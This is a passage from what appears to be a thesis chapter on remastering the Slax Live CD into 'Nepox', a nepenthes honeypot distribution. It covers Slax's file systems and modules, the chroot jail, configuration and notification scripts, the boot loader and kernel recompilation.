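print("Preferred alternative:", max(base, key=base.get))
```

Because the weights are computed from unrounded fractions, individual products may differ from the rounded table entries in the second decimal place, while the weighted sums agree with the tables after rounding to one decimal.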
Under consideration of the given attributes, the alternative with the highest weighted sum is favored, in our case, the Slackware-based distribution Slax. We were able to verify this result by performing a sensitivity analysis. However, it needs to be emphasized that parts of our assessment still remain subjective, e.g., when assigning weights or attribute values. Thus, other distributions could equally be used to create a Live CD-based honeypot. For example, the CD developed by the SurfIDS project (see Chapter 2) is built upon Knoppix. Hence, our choice is eventually also a matter of personal preference. The following explanations refer to the modification and customization of the Slax Live CD.

4.3 Development and Remastering Process of the Live CD

As we have outlined in the previous section, we use Slax as a foundation for our own Live CD-based honeypot. However, a good understanding of the base architecture is required in order to successfully remaster the CD and adapt it to our needs. For this reason, we give a brief overview of the technical implementation of the distribution before explaining the development process in detail.

4.3.1 Technical Architecture of Slax

4.3.1.1 Boot Sequence

Similar to other Live CDs, Slax is compliant with the so-called El Torito standard, a format specification that describes how to make a CD bootable (see Stevens and Merkin, 1995). Thus, when the computer is powered on, the system BIOS is able to invoke a boot loader on the CD. The boot loader presents a list of valid boot images to the user and determines the parameters and additional options the operating system is started with. When such an image is launched, control is passed to the Linux kernel, and an initial RAM disk is loaded into memory. This disk serves as a root file system and contains a small number of applications which are needed for further initialization tasks. Most importantly, the special script linuxrc gets executed.
Linuxrc is responsible for loading essential hardware drivers and creating a temporary live file system to permit later access to programs and files. Finally, the first process of the operating system, init, is run, which serves as a parent for all other services and daemons. Depending on the run level, init makes different sets of programs and applications available; by default, it starts a graphical desktop manager with multiuser support. A summary illustration of the boot sequence is given in Figure 4.3. We will have a closer look at the individual phases in a later section (see also Negus, 2007; Jones, 2006a). First of all, however, we describe the file storage and file maintenance mechanisms used by the distribution.

Figure 4.3: Boot Sequence of the Slax Live CD

4.3.1.2 File Systems

Slax relies on two special file systems in order to store and manage files efficiently.

• SquashFS: The SquashFS [9] file system is used to compress files and entire directory structures. Thereby, it is possible to keep the size of the distribution moderately small while providing a decent number of applications. By applying a high-performance compression algorithm such as the Lempel-Ziv-Markov chain algorithm (LZMA), the compression ratio can be increased even further (see also Lougher and Okajima, 2008). However, one major disadvantage of SquashFS is that it is solely capable of saving data in read-only mode. Therefore, operations which require write permissions must be executed on a second, flanking file system.

• Aufs: Due to the limitations of SquashFS and the physical characteristics of CD-ROMs, content is always only accessible in read-only mode. During a user session, system settings need to be frequently altered and updated though. To circumvent these restrictions, files must be temporarily shifted into writable sections of volatile memory.

[9] see http://squashfs.sourceforge.net/
In theory, several possibilities exist to realize this operation. For instance, it is possible to copy the entire root directory tree completely into RAM in order to make the full disk available. However, this approach is not satisfactory, because large portions of space are consumed. Another option is to restrict modifications to certain parts of the system, for example, the home directory of a user. This solution is not convincing either because it makes reconfigurations and new installations significantly more difficult.

To overcome these obstacles, Live CDs frequently implement so-called union file systems. These types of file systems are able to merge read-only systems such as SquashFS with a special directory in memory which possesses full access permissions (cf. Wright et al., 2004). The result of those joined directories is called a union. When a file needs to be changed, it is transparently transferred from the read-only section to the writable branch of the union. This process is known as a copyup. Thereby, while the file may be temporarily modified in memory, its original physical instance is never touched. Consequently, the union acts as a virtual overlay for the underlying disk structure of the CD (cf. Figure 4.4).

Several software applications support the creation of union file systems. Slax uses aufs (Another Union File System) [10], which is maintained by Junjiro Okajima. It has considerable advantages concerning performance and stability over Unionfs, a comparable solution which is more popular [11].

[10] see http://aufs.sourceforge.net/
[11] see http://www.am-utils.org/project-unionfs.html and the discussion on the mailing list of the Stony Brook University, http://www.fsl.cs.sunysb.edu/

Figure 4.4: Illustration of the Union File System

4.3.1.3 File System Modules

In order to store programs and other software components on the CD, Slax uses a number of file system modules.
Each module saves a specific directory tree in compressed format. When the system boots up, the modules are uncompressed and mounted into a temporary union to create a global unified file system. As we have described in the previous section, this operation is completely transparent to the end user.

A major advantage of the modular approach is that remastering the operating system is much more comfortable compared to other distributions. For instance, to remove a set of applications with a certain behavior, it is sufficient to delete the corresponding module. This process does not affect the functionality of other software artifacts. In turn, Slax can be easily extended by developing new modules which are automatically integrated by the system at startup. In fact, a huge collection of different modules for various purposes is already available for download [12].

[12] see http://www.slax.org/modules.php

By default, Slax defines nine base modules with numerous software packages. A software package provides a pre-configured, fully working application. A description of all software packages can be found on the accompanying CD-ROM of this thesis; a short overview of the base modules is given in Table 4.6.

As we have already indicated, the concepts outlined above need to be thoroughly understood before starting to adapt the distribution. Furthermore, because changes may greatly affect system stability and performance, we recommend planning and documenting all modifications in advance. The project specifications for our Live CD are presented in the following. The description of the remastering process is the subject of Section 4.3.3.
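The union and copy-up behavior on which the module concept builds (see Section 4.3.1.2) can be mimicked with a small toy model in Python. This is only an illustrative sketch under simplifying assumptions and not the aufs implementation: the class `UnionMount`, its methods, and the sample paths are hypothetical, dictionaries stand in for directory trees, and the rule that earlier branches take precedence is an arbitrary choice made for the example.

```python
from types import MappingProxyType


class UnionMount:
    """Toy model of a union: read-only branches plus one writable branch."""

    def __init__(self, *read_only_branches):
        # Read-only branches, standing in for the compressed modules on the CD.
        # Assumption for this sketch: earlier branches take precedence.
        self._lower = [MappingProxyType(dict(b)) for b in read_only_branches]
        # Writable branch, standing in for the directory kept in volatile memory.
        self._upper = {}

    def read(self, path):
        # The writable branch hides any read-only copy of the same file.
        if path in self._upper:
            return self._upper[path]
        for branch in self._lower:
            if path in branch:
                return branch[path]
        raise FileNotFoundError(path)

    def append(self, path, text):
        # Copy-up: the first modification copies the file into the writable
        # branch; the read-only original is never touched.
        if path not in self._upper:
            self._upper[path] = self.read(path)
        self._upper[path] += text

    def reset(self):
        # Models a reboot of the Live CD: all changes held in memory are lost.
        self._upper.clear()


core = {"/etc/hostname": "slax\n"}
apps = {"/usr/bin/gawk": "<binary>"}

union = UnionMount(core, apps)
union.append("/etc/hostname", "# edited at runtime\n")
print(union.read("/etc/hostname"))
```

In this model, removing a module corresponds to leaving out one of the read-only dictionaries when the union is created; the remaining branches are unaffected.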
Module        Description
001-core      Base system with essential hardware drivers, libraries, and console applications for administrative purposes
002-apps      Extends the core module and provides a collection of popular services and applications, e.g., the Common Unix Printing System (CUPS), the Gnu Awk (GAWK) text processor, and the OpenSSL libraries to support cryptographic functions
003-network   Collection of network-related daemons and applications, for example, the bind DNS server, a basic Internet browser, multiple network monitoring tools, and utilities for remote connection
004-xorg      Libraries for the graphical desktop environment
005-xapdeps   Extends the xorg module and stores additional libraries for the graphical desktop environment
006-kde       Provides the K Desktop Environment (KDE), a graphical user interface, and basic multimedia applications
007-kdeapps   Extends the KDE session manager with various multimedia applications such as K3b, a CD recording utility
008-office    Basic office and text processing applications
009-devel     Stores multiple applications for software development, including the Gnu Compiler Collection (GCC) and the Linux kernel headers

Table 4.6: Base Modules Included in the Slax Live CD

4.3.2 Project Specifications for the Live CD

The central component of our Live CD is formed by a pre-configured honeypot. More precisely, we favor a low-interaction variant for two main reasons: First, a low-interaction honeypot imposes a comparatively smaller level of complexity on the system administrator. Thus, it can be quickly set up and is easy to maintain as we have explained in Chapter 2. Second, one of the primary objectives of this project is to support the deployment of honeynets with numerous electronic baits within a short amount of time in order to collect data about malicious activities on a large scale.
For a standardized high-interaction environment, attackers would likely be able to develop fingerprints of the systems sooner or later and circumvent the decoys in the future (cf. Honeynet Project, 2004b). This would render the CD ineffective. That is why high-interaction honeypots are not applicable in our case.

To integrate the honeypot with our Live CD, we develop a separate file system module which is automatically loaded when the operating system is started. The module contains the core honeypot files, its system dependencies, and various scripts for configuration and administrative purposes.

Concerning the low-interaction honeypot, we choose to implement nepenthes, which we have already introduced in a previous chapter of this thesis. Nepenthes runs stably and can be set up without problems. Additionally, its hardware requirements are moderate. It consumes only small amounts of memory and is highly scalable (cf. Bächer et al., 2006). These characteristics make nepenthes well-suited for our needs.

To guarantee the integrity and safety of the CD, we execute the honeypot within a secured environment, a so-called jail, that is difficult to break out of. Even if adversaries succeed in compromising the decoy, their access is restricted to certain files and directories, and they cannot modify substantial parts of the disk.

Another challenge that we must cope with is the volatile environment of the Live CD: When the system crashes or is accidentally rebooted, all results of our research are lost, because data is solely stored in memory. We can solve this problem by sending captured malware as well as information about threats and intrusions to a central server on the Internet. The server is responsible for creating backups of our files and generating reports about the behavior of the malicious software coming in. Thereby, security professionals ideally need to analyze the status of only this machine on a regular basis.
In contrast, once started, the Live CD-based honeypot is supposed to collect incident-related data without further, significant manual intervention. However, in case administrators have to reconfigure certain parts of the system, they should be able to log in locally or remotely over an encrypted network connection at any time. The core functionality of the Live CD as well as the co-operation with the central server is shown in Figure 4.5; the implementation of the individual software parts is illustrated in the next section.

Figure 4.5: Functionality of the Live CD-Based Honeypot

4.3.3 Illustration of the Remastering Process of the Live CD

4.3.3.1 Preparing the System Environment

In order to develop our own Live CD, we must make substantial modifications to the base modules that are provided with Slax (cmp. Table 4.6). For this reason, we need to copy the compressed modules to a persistent hard disk partition, uncompress the necessary files, make appropriate changes, and finally burn the new derivative of the distribution to CD.

To create the persistent system environment, we use a so-called partition editor like fdisk or cfdisk. The partition editor helps divide a hard disk into smaller, more manageable sections of space (see Dalheimer and Welsh, 2005) [13]. With regard to our project specifications, we add a partition with a size of 1.5 GB: About 800 MB have to be reserved for the decompressed modules, another 250 MB for the final image of our CD. The remaining space may be used for file manipulation operations.

In order to store files on the new partition, we need to build a valid Linux file system with the help of the mkfs command and mount it into the directory hierarchy of the operating system. Afterwards, we can recursively copy the CD to hard disk and extract the base modules using the lzm2dir utility which is part of the Slax Live CD.
This process is illustrated in Lines 1 to 18 of Listing 4.1. When all changes are completed, we compile an updated version of the module in question, compress it with the dir2lzm application (see Lines 20 to 24), which is also provided by Slax, and finally overwrite the original instance on the CD. In the last step, we run the make_iso.sh script to generate a new, bootable image of the distribution that can be burned to CD as we have already indicated. The individual actions which are required to remaster the main parts of the Live CD are summarized in Figure 4.6. As we will see in the following section, we go through a similar process to build our own honeypot module.

Figure 4.6: Overview about the Remastering Process

[13] Note: This reference applies to all system commands and applications that are described in this section unless otherwise stated.

     1  # create the file system for the partition hda2
     2  mkfs -t ext3 /dev/hda2
     3
     4  # create a mount point for the partition
     5  mkdir /mnt/hda2
     6  mount -o rw /dev/hda2 /mnt/hda2
     7
     8  # recursively copy the CD to hard disk
     9  cp -rdpv /mnt/live/mnt/hdc /mnt/hda2/CD
    10
    11  # create a source directory for the modules
    12  mkdir /mnt/hda2/sources
    13  cd /mnt/hda2/sources; mkdir 001-core; ...; mkdir 009-devel
    14
    15  # decompress the base modules of the CD
    16  lzm2dir /mnt/hda2/CD/slax/base/001-core.lzm 001-core/
    17  ...
    18  lzm2dir /mnt/hda2/CD/slax/base/009-devel.lzm 009-devel/
    19
    20  # after all changes have been made, compress the new module and
    21  # overwrite the original module with the updated version
    22  dir2lzm 001-core/ 001-core.lzm
    23  ...
    24  dir2lzm 009-devel/ 009-devel.lzm
    25
    26  cp *.lzm /mnt/hda2/CD/slax/base
    27
    28  # create an image of the new Live CD
    29  /mnt/hda2/CD/slax/make_iso.sh

Listing 4.1: Preparation of the System Environment

4.3.3.2 Developing the Honeypot Module

Our honeypot module is composed of three interdependent elements, namely the nepenthes low-interaction honeypot as the core component, the secured system environment, and a couple of scripts that are required for maintaining and configuring the decoy.

Building the core honeypot files: By default, nepenthes consists of a significant number of vulnerability, shellcode parsing, fetch, submission, and logging modules. The interaction among these modules has already been described in Chapter 2; a thorough explanation can also be found in the paper by Bächer et al. (2006). However, it is important to stress that many of the standard vulnerability modules in particular are quite outdated. For example, the vuln-asn1 module emulates a buffer overrun flaw in a Microsoft Windows system library which was published in 2004 (see Microsoft Corporation, 2004b). For this reason, it is questionable whether these types of vulnerabilities are still capable of attracting common malware of today (cmp. Holz, 2008). That is why we supplement nepenthes with several additional modules that are developed and maintained at the University of Mannheim. They are able to simulate more recent security weaknesses and, thus, are likely to be targeted by newer variants of malicious software. An overview of the custom modules is given in Table 4.7.

Type of Module          Name of Module         Description
Logging Modules         log-download-privacy   Logs download and submit events and supports the anonymization of local IP addresses.
                        log-geoip              Queries a geographical database to find location-related information about an attacker.
                        log-surfnet-privacy    Sends submission-related events to a central server. Local IP addresses are sanitized for privacy purposes.
Other Modules           module-mirror          Mirrors incoming malicious traffic to simulate a vulnerable system.
                        module-proxy           Acts as a proxy server for incoming malicious traffic.
Vulnerability Modules   vuln-apache2058        Emulates an off-by-one remote buffer overflow vulnerability for the Apache ModRewrite module.
                        vuln-arcserve          Emulates a buffer overflow vulnerability for the CA BrightStor ARCserve Backup.
                        vuln-arcservesql       Emulates a remote buffer overflow vulnerability for the CA BrightStor ARCserve Backup Agent for SQL.
                        vuln-axigen2b          Emulates a remote format string vulnerability for the Axigen eMail Server 2.0.0b2.
                        vuln-brightstor11520   Emulates a remote injection vulnerability for the CA BrightStor Backup 11.5.2.0 application.
                        vuln-chimaeraftp       Emulates a remote buffer overflow vulnerability for the WFTPD and FreeFTPD FTP server.
                        vuln-com3tftp          Emulates a remote buffer overflow vulnerability for the 3Com TFTP server.
                        vuln-imail2006         Emulates a remote buffer overflow vulnerability for the IpSwitch IMail 2006 and IMail 8.x mail server.
                        vuln-mailenable1x      Emulates a remote buffer overflow vulnerability for the MailEnable Enterprise 1.04 and MailEnable Professional 1.54 mail server.
                        vuln-mailenable234     Emulates a remote buffer overflow vulnerability for the MailEnable Enterprise 2.34 mail server.
                        vuln-ms06040           Emulates a remote buffer overflow vulnerability for the Server service of Microsoft Windows.
                        vuln-ms06070           Emulates a remote buffer overflow vulnerability for the Workstation service of Microsoft Windows.
                        vuln-wftpd323          Emulates a remote buffer overflow vulnerability for the WFTPD 3.23 FTP server.
Table 4.7: Custom-Built Modules of the nepenthes Low-Interaction Honeypot

To build the different elements of the honeypot, we have to use various helper tools that are part of the GNU Configure and Build System (see Vaughan et al., 2000): The GNU autoconf [14] utility creates a configuration script from a template file for a given source code package. The script probes the operating system the package will be installed on for numerous platform-specific features. For instance, it checks the availability of certain dependency libraries. In this way, it verifies that all system requirements are fulfilled.

The default nepenthes source package is already distributed with such a configuration script and comprises the standard modules. Because our Live CD implements a custom-built version of the honeypot, however, we must update this script. Therefore, we edit the original template file, add the directory path of our own modules, and execute the autoreconf command to take the new definitions into account. We must also run GNU automake [15] which, in co-operation with autoconf, generates a so-called global Makefile. This file is processed by the make command to compile the source code of the honeypot. By specifying the DESTDIR parameter and the install argument, we can finally install the application to a pre-set location. A summary of these operations is shown in Figure 4.7.

[14] see http://www.gnu.org/software/autoconf/
[15] see http://www.gnu.org/software/automake/

Figure 4.7: Illustration of the GNU Configure and Build System

Preparing the secured environment: As we have outlined in Section 4.3.2, the honeypot is to be executed within an isolated, minimized environment, i.e., only a rudimentary set of functions and operations is made available.
For this reason, we need to supply nepenthes with all its dependencies, namely the libadns [16], libcap [17], libcurl [18], libmagic [19], libpcap [20], libpcre [21], and libprelude [22] libraries. A brief description of these libraries is shown in Table 4.8. Their source code is prepared and compiled with the configure and make commands, analogously to the building process of the base honeypot. In the last step, we separate the program files from other parts of the operating system by invoking make install with the DESTDIR parameter as described above.

[16] see http://www.chiark.greenend.org.uk/~ian/adns/
[17] see ftp://ftp.kernel.org/pub/linux/libs/security/linux-privs/kernel-2.6/
[18] see http://curl.haxx.se/
[19] see http://packages.debian.org/unstable/libdevel/libmagic-dev
[20] see http://www.tcpdump.org/
[21] see http://www.pcre.org/
[22] see http://www.prelude-ids.com/en/development/download/

Dependency Library   Description
Libadns              Libadns is an easy-to-use, asynchronous-capable DNS resolver that translates domain names into IP addresses.
Libcap               This library enables nepenthes to use the POSIX 1e capability support that is built into the Linux kernel (see Trümper, 1999). With so-called Access Control Lists (ACLs), it is possible to have fine-grained control over the privileges of a file.
Libcurl              These libraries are used for downloading malicious files over HTTP and FTP.
Libmagic             Libmagic determines the type of a file based on a magic number or a string that is found in the file.
Libpcap              The Libpcap library offers a high-level interface for capturing network packets.
Libpcre              The Libpcre library is a set of functions for pattern matching with Perl-compatible regular expressions.
Libprelude           Libprelude is a supportive library for the hybrid intrusion detection framework Prelude that enables different security applications to report to a central system. In order to use this function, nepenthes must be configured and compiled with the option --enable-prelude.

Table 4.8: Dependency Libraries Required for the nepenthes Low-Interaction Honeypot

Building the secured environment: When all operations are finished, we copy the generated package trees to a single directory. This directory serves as a foundation for the secured zone which can later be set up easily with the chroot command. By invoking chroot, a pseudo root directory is created (see Flenov, 2005). As a consequence, files that are stored in upper layers of the directory hierarchy cannot be accessed any longer, because the created environment appears to be the top node of a virtual file system (cmp. also Friedl, 2002; Burr, 2002). Thereby, applications that are executed with non-superuser privileges within the chrooted directory are held captive in a tightly bound jail.

To permit proper operations, the jail encloses the bash (Bourne-Again Shell) command interpreter as well as binaries to list the contents of files and directories, e.g., the cd and ls commands. These utilities, in turn, make use of additional software components, for example the general libc library which defines basic system calls and functions for the C programming language the executables are written in. The dependencies must be copied to the appropriate branches in the directory hierarchy. The ldd command is of great help to find the correct path of the auxiliary files. In the last step, we run ldconfig, an administrative tool for rebuilding the cache of the runtime linker. Thereby, all shared libraries can be found when a program is launched.

In order to successfully invoke the honeypot within our secured zone, we must make a number of further changes: First, we have to add the /tmp directory with global access permissions to permit temporary operations. Additionally, the /var/log directory must be created in order to enable logging activities.
Second, we generate the world-readable passwd and group files in the etc directory of our jail. These files store authentication-related information about legitimate users and groups of the system and are required by nepenthes. A typical line in the passwd file is printed below. The entry defines the superuser account with a user and group identification number of 0, the home directory, and the command shell to be used. The x in the second column refers to a so-called shadow file which usually contains the encrypted system passwords. However, as we do not perform any login operations within the isolated environment, the shadow file is omitted for security reasons.

    root:x:0:0::/root:/bin/bash

Third and last, we set up a device special file /dev/null with the mknod command. The file accepts arbitrary input flows but does not produce any corresponding output streams (cmp. Dalheimer and Welsh, 2005). As we will see later, this characteristic is extremely beneficial to discard unwanted error and notification messages from our scripts.

Once all modifications are completed, the jail has a structure as shown in Figure 4.8. It is similar to the original directory tree of the operating system even though the number of applications provided is significantly smaller. To start nepenthes within the secured environment, we execute the chroot command as follows:

    chroot . bin/bash -c [path to nepenthes] -u <user> -g <group>

The decoy is then initialized with full access permissions by the bash command interpreter. This operation is necessary to permit emulating services that bind to the well-known ports (cmp. Internet Assigned Numbers Authority (IANA), 2008), i.e., ports with registered numbers less than 1024. An example of an emulated service that binds to a well-known port is defined in the Apache module of nepenthes. The module simulates an HTTP server and listens on port 80.
Services running on the registered and private ports (i.e., 1024 and higher) may be executed with a non-privileged user account for security reasons. The username and corresponding group can be specified with the -u and -g options.

Developing the maintenance and configuration scripts: To facilitate the configuration of the honeypot, we develop a graphical interface that allows users to enable or disable individual modules as well as edit specific program settings. All modifications take effect when nepenthes is restarted.

Figure 4.8: Directory Structure of the Secured Live CD Environment

The graphical interface is based on the dialog package [23] which is maintained by Vincent Stemen. The dialog application is called from within a shell script. By specifying different command line parameters, we are able to display various interactive elements such as message boxes, checklists, or text fields. Input and output operations are redirected to the system console. That is why it is possible to perform administrative tasks locally as well as over a non-graphical, remote network connection.

When our shell script is launched, a menu with different selection options is shown. The user may then, for instance, choose to view the list of activated vulnerability modules (see Figure 4.9(a)). This list and other program variables are stored in the main nepenthes configuration file. A module-related entry in the configuration file is divided into three sections and consists of the module name, the name of a module-specific dependency file, and another parameter which is usually left empty. For example, the configuration directive for the Sub7 trojan backdoor [24] refers to the vuln-sub7.so module and a dependent vuln-sub7.conf file.
Since other modules are described in a similar fashion, we are able to define a regular expression which helps find standardized text patterns quickly (see Friedl, 2006, for a complete overview of regular expressions). Regular expressions are supported by many programming languages, e.g., awk [25], which is already included on the Slax Live CD and may thus be easily integrated into our distribution. With the help of a simple awk program, we extract the relevant text fragments from the main configuration file and temporarily save the results in memory. Other potential inter-process messages that are returned by the command shell are discarded through redirection to the device special file /dev/null as we have explained above. Thus, the execution of the awk script is completely transparent to the user.

[23] see http://hightek.org/dialog/
[24] see http://www.sub7legends.com/

When the operation is finished, the temporarily stored data is read in, and the status of the different modules is displayed within a new dialog window. The user may then interactively enable or disable specific components of the honeypot. After all changes have been made, the list of selected modules is returned. The program settings are then updated with sed [26], a second helper utility which is capable of editing specific sections of a file (see Dougherty and Robbins, 1997). To deactivate a certain module, we write a basic sed instruction and simply insert two leading slashes (//) before the respective entry in the configuration file. As a consequence, the string is interpreted as a user comment and gets ignored when the file is parsed at the start of nepenthes. To reactivate a module, the comment characters are removed, and the original entry is restored. An extract of the corresponding shell script which illustrates the interaction with awk and sed is printed in Appendix A.
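The comment-based toggling described above can be sketched in a few lines of shell. This is only a minimal illustration and not the script from Appendix A: the function names are hypothetical, the layout of a module entry (a quoted module name at the start of a line, followed by the dependency file and an empty third field) is an assumption, and the in-place option -i is assumed to be available as in GNU sed.

```shell
#!/bin/sh
# Hypothetical helpers; the entry layout of the configuration file is assumed
# to be:   "vuln-sub7.so", "vuln-sub7.conf", ""

# disable_module FILE MODULE
# Inserts two leading slashes before the entry unless it is already commented.
disable_module() {
    sed -i "s|^\([[:space:]]*\)\(\"$2\"\)|\1//\2|" "$1"
}

# enable_module FILE MODULE
# Removes the leading slashes again and restores the original entry.
enable_module() {
    sed -i "s|^\([[:space:]]*\)//[[:space:]]*\(\"$2\"\)|\1\2|" "$1"
}

# list_active_modules FILE
# Prints the names of all entries that are not commented out.
list_active_modules() {
    awk -F'"' '/^[ \t]*"[^"]*\.so"/ { print $2 }' "$1" 2>/dev/null
}
```

A call such as disable_module nepenthes.conf vuln-sub7.so would comment out the Sub7 entry, and list_active_modules nepenthes.conf would then no longer report it. Note that the dot in the module name is treated as a regular expression wildcard here, which is harmless for names of this form.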
Our graphical interface also permits modifying module-related program parameters of the honeypot. For this purpose, we list the individual configuration files in a separate file selection dialog (see Figure 4.9(b)). When a choice is made, the specific file is opened in an external editor, and the user has the possibility of manually updating the program options. For example, in order to change the Internet address of the central server malicious binaries will be sent to, the file submit-norman.conf is automatically opened.

Building the entire honeypot module: The configuration script, the core honeypot package, and its dependencies are finally compressed with the dir2lzm command to create a new Live CD module as we have outlined in the previous section. The generated module is then copied to the base directory of the distribution so it is loaded at system startup. Afterwards, nepenthes can be launched over the default desktop manager and commence collecting data about threats and intrusions. For this purpose, we need to adapt the graphical user interface of the operating system. This process is explained in Section 4.3.3.7.

Users are also to be automatically informed about honeypot-related events on a regular basis. For this reason, we also implement a notification system on the Live CD. The architecture of this system is the subject of the next section.

[25] see http://www.gnu.org/software/gawk/gawk.html and (cmp. Dougherty and Robbins, 1997)
[26] see http://www.gnu.org/software/sed/

Figure 4.9: Honeypot Configuration Interface of the Live CD
(a) Module Selection Dialog for Activating/Deactivating the Vulnerability Modules
(b) File Selection Dialog for Editing a Configuration File

4.3.3.3 Implementing the Notification System

Once the nepenthes honeypot is started, it generates a significant amount of information about threats and malicious activities with the help of several logging modules (cmp. previous section).
For instance, whenever a compromise is detected and a piece of malicious software is successfully captured, this event is written to a special file which is stored in the var/log folder of the application directory. However, when data is collected simultaneously on multiple machines, analyzing each device can be time-consuming. For this reason, we set up an automated notification system in order to decrease the maintenance effort for system administrators and security professionals. Aggregated status reports for the individual decoys can then be received on a daily basis.

The architecture of the notification system is based upon three components, namely the logrotate utility, the mailx program, and the Postfix server. These components are briefly described in the following.

The logrotate utility [27] by Erik Troan and Preston Brown is already included in the original Slax distribution and permits “rotation, compression, removal, and mailing of log files” (see Troan and Brown, 2002). Due to these features, we are able to automatically process messages that are generated by nepenthes within a given time interval. For this purpose, we define various directives in the main configuration file /etc/logrotate.conf. For example, to add a timestamp to each of the relevant log files, we specify the dateext directive (see also Ducea, 2006; Sharma, 2005). Additionally, we implement definitions to create a daily archive of all files. The archive is compressed in order to save space on the Live CD.

[27] see https://fedorahosted.org/logrotate/wiki

Figure 4.10: Architecture of the Notification System on the Live CD

In the next step, the compressed archive is passed to the mailx program. As the name suggests, mailx [28] is a simple tool for sending and receiving mail. It is maintained by Gunnar Ritter.
One of its major advantages is that it can be executed either interactively or entirely through a script by specifying a number of command line arguments. Therefore, we are able to compose an automated message and inform users about honeypot-related incidents, while sending the archive with the nepenthes log files as an attachment.

The actual delivery of the message is performed by a Postfix server [29] which is implemented as an independent mail transfer agent (MTA) on the CD. In comparison to other MTAs such as Sendmail [30], Postfix is particularly reliable, robust, and secure while being easy to use (cmp. Dent, 2002). These characteristics make Postfix well-suited for a security-sensitive environment. A summary of the cooperation between the different components is illustrated in Figure 4.10.

In the following sections, we explain the remastering and customization activities for other major components of the Live CD, including the boot loader and the system kernel. The chronological order of the description is in accordance with the boot sequence of the distribution that we have described in Section 4.3.1.1 (see also Figure 4.3).

[28] see http://sourceforge.net/projects/nail/
[29] see http://www.postfix.org/
[30] see http://www.sendmail.org/

4.3.3.4 Adapting the Boot Loader

As we have already explained, the central task of a boot loader is to invoke the kernel of the operating system after the machine has been started. The Slax Live CD implements the Isolinux [31] boot loader by H. Peter Anvin. It is open source, free of charge, and fully compatible with the El Torito format specification which is required to launch the distribution from CD.

[31] see http://syslinux.zytor.com/iso.php

For our purposes, Isolinux only needs to be slightly adapted. First, the package of the boot loader is saved to a directory in the boot folder of the Live CD. It contains an isolinux.cfg configuration file which is processed at system startup. The configuration file includes a number of boot labels the user may select from. A boot label typically comprises the path to the kernel as well as additional boot options that are passed to the core services for further initializing operations. Due to those options, multiple system profiles may be created. For instance, it is possible to specify different video modes in order to support machines with limited screen resolution capabilities. A sample label is shown in Listing 4.2.

    1  LABEL xconf
    2  MENU LABEL Nepox Graphics mode (KDE)
    3  KERNEL /boot/vmlinuz
    4  APPEND vga=769 initrd=/boot/initrd.gz ramdisk_size=6666 root=/dev/ram0 rw
    5      passwd=ask autoexec=xconf;kdm

Listing 4.2: Sample Boot Label of the Isolinux Boot Loader

As can be seen in Line 4, the different boot options are defined in a separate APPEND section. One of the most important options is initrd. It determines the location and size of the initial ram disk which is responsible for storing several key applications as we have briefly described in Section 4.3.1.1. With the help of the passwd parameter, the user may be prompted to change the default password when the operating system is loaded. We include this parameter for security purposes, because users are free to log in remotely over the Internet for maintenance reasons. A description of the remaining boot options as well as all other valid boot declarations can be found in Appendix B.

4.3.3.5 Compiling the System Kernel

The name and boot picture of the original Slax distribution are deeply rooted in the core of the operating system. To replace the existing information and display our own logo at startup, we need to recompile the system kernel.
This operation, however, cannot be directly performed from within the Live CD, because only a reduced set of the necessary source files is provided in order to save disk space. For this reason, recompilation must be invoked on a full-featured operating system. We recommend installing Slackware, as it is the parent distribution of Slax (cmp. Section 4.1). We must then obtain the kernel files and the archives of the SquashFS and aufs file systems. As we have described in Section 4.3.1.2, SquashFS and aufs are used to store data in a compressed format as well as permit write operations during runtime. They are required to build a proper Live CD and must therefore be integrated into the kernel. The author of Slax maintains a web server where all required packages may be downloaded [32]. These packages must be extracted to the /usr/src/ directory where the core sources of the operating system are stored.

    # create a valid logo file
    pngtopam logo.png | pnmquant 223 | pnmtopnm -plain > logo_linux_clut224.ppm

    # copy the logo to the directory of the kernel sources
    cp logo_linux_clut224.ppm /usr/src/linux-`uname -r`/drivers/video/logo/

Listing 4.3: Creating a Kernel Logo for the Live CD

To build a new, adapted version of the kernel for our Live CD, the following steps have to be carried out (cmp. Kroah-Hartman, 2006): First, a valid kernel configuration file must be created, either from scratch, from a default configuration file, or taken from a distribution release. The configuration file contains instructions on whether specific drivers or other architectural objects are excluded entirely from the compilation process, directly compiled into the core, or provided as loadable kernel modules (LKMs). A loadable kernel module can be dynamically attached or detached during runtime without needing to reboot the system.
This characteristic is a major advantage, because it offers a great deal of flexibility and makes it possible to quickly modify the current hardware profile. Furthermore, a module is completely unloaded from memory and does not occupy space any longer when asked to detach, in contrast to elements of the base kernel that must always reside in memory even when idle. That is why it is generally proposed to build kernel components modularly where feasible and keep the size of the core system as small as possible (see Henderson, 2006).

A complete list with the individual compilation decisions is also available on the web server of the Slax distributor. This list forms a good basis for our own kernel definitions. To create the final configuration file, the list must be renamed to .config and copied to the directory of the core sources. Afterwards, we simply run the make oldconfig and make prepare commands to initialize the recompilation process.

In the second step, we integrate our own custom boot logo into the kernel. It is composed of a picture of the nepenthes carnivorous plant as well as the name that we have chosen for our Live CD, Nepox, an acronym for nepenthes out of the box. The input source for the logo can be any graphical format, but it must be converted to a so-called portable pixel map (PPM) with less than 224 colors (cmp. logo linux.h as defined by the Linux Kernel Organization, 2008). Conversion can be easily done with netpbm [33], an image manipulation toolkit by Bryan Henderson which is open source and free of charge. In Listing 4.3, sample commands for creating a logo from a PNG (Portable Network Graphics) file are shown.
After specifying the boot picture for our Live CD, we are able to compile the loadable kernel modules and the core components with the make command as illustrated in Listing 4.4. The file system modules for SquashFS and aufs are not part of the kernel configuration and must therefore be built separately (see also Lougher and Okajima, 2008).

[32] see ftp://ftp.slax.org/source/slax/kernel/
[33] see http://netpbm.sourceforge.net/

    # create a temporary directory for the new kernel
    KERNEL=/tmp/`uname -r`
    mkdir -p $KERNEL

    # change to the directory of the kernel sources
    cd /usr/src/linux-`uname -r`/

    # compile and install the loadable kernel modules in the directory
    # of the system kernel
    make -j 4 modules
    INSTALL_MOD_PATH=$KERNEL make modules_install

    # create a compressed kernel image
    make -j 4 bzImage

    # save the kernel configuration and the kernel image to the
    # directory of the new kernel
    mkdir -p $KERNEL/boot
    cp .config $KERNEL/boot
    cp arch/i386/boot/bzImage $KERNEL/boot/vmlinuz

Listing 4.4: Compiling the Kernel for the Live CD

In the next step, we need to transfer all created files to our distribution. However, even though all dependencies are now included in the Live CD, the system is not functional yet. We still have to update the initial ram disk which is run at system startup and integrates support for the basic file systems as well as the core drivers. Performing this operation manually is error-prone because many files must be copied individually (cmp. Jones, 2006b). For this reason, the author of Slax has published a free collection of scripts, the so-called Linux Live scripts, to facilitate this process (see Matejicek, 2008b). The scripts generate a valid ram disk which must be saved to the boot directory of the CD.
